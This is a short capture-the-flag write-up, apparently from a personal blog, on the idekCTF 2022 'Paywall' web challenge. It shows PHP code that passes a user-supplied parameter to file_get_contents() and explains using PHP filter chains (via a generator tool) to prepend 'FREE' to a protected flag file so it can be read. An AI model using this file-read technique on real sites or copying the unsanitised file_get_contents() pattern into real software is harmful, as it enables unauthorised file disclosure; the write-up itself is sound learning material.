idekCTF 2022-web-Paywall

yoobi·2023년 2월 21일


  • php, file_get_contents() function vulnerability
  • php wrapper ex) php://filter
  • PHP filter chain generator (tool)

Given info

  • paywall.tar.gz was given
    │  Dockerfile
        │  index.php
        │      .htaccess
        │      flag
        │      hello-world
  • We can find /src/articles/flag file PREMIUM - idek{REDACTED}
  • We should read flag file

	if (isset($_GET['p'])) {
		$article_content = file_get_contents($_GET['p'], 1);

		if (strpos($article_content, 'PREMIUM') === 0) {
			die('Thank you for your interest in The idek Times, but this article is only for premium users!'); // TODO: implement subscriptions
		else if (strpos($article_content, 'FREE') === 0) {
			echo "<article>$article_content</article>";
		else {
			die('nothing here');
  • But, the flag file start with 'PREMIUM', thus we can not read this file
  • We only can read that which is start with 'FREE' file


  1. read flag file

read file using PHP filter chain generator

  • This service read and parsing data using file_get_contents function
  • Then, we can try php wrapper(php://filter) to do something
  • In this chall if we add "FREE" in front of the file data, we can easily read the file logically
  • We can add some value using php filter chain generator
# python3 --help
usage: [-h] [--chain CHAIN]
                                     [--rawbase64 RAWBASE64]

PHP filter chain generator.

optional arguments:
  -h, --help            show this help message and exit
  --chain CHAIN         Content you want to generate. (you will maybe need to
                        pad with spaces for your payload to work)
  --rawbase64 RAWBASE64
                        The base64 value you want to test, the chain will be
                        printed as base64 by PHP, useful to debug.
  • change the file_to_use in file
# No need to guess a valid filename anymore
file_to_use = "flag"
  • Then, make "FREE" added php filter
# python3 --chain "FREE  "
[+] The following gadget chain will generate the following code : FREE   (base64 value: RlJFRSAg)
  • Give the result to web service
  • Then, we can get FLAG
this is yoobi

0개의 댓글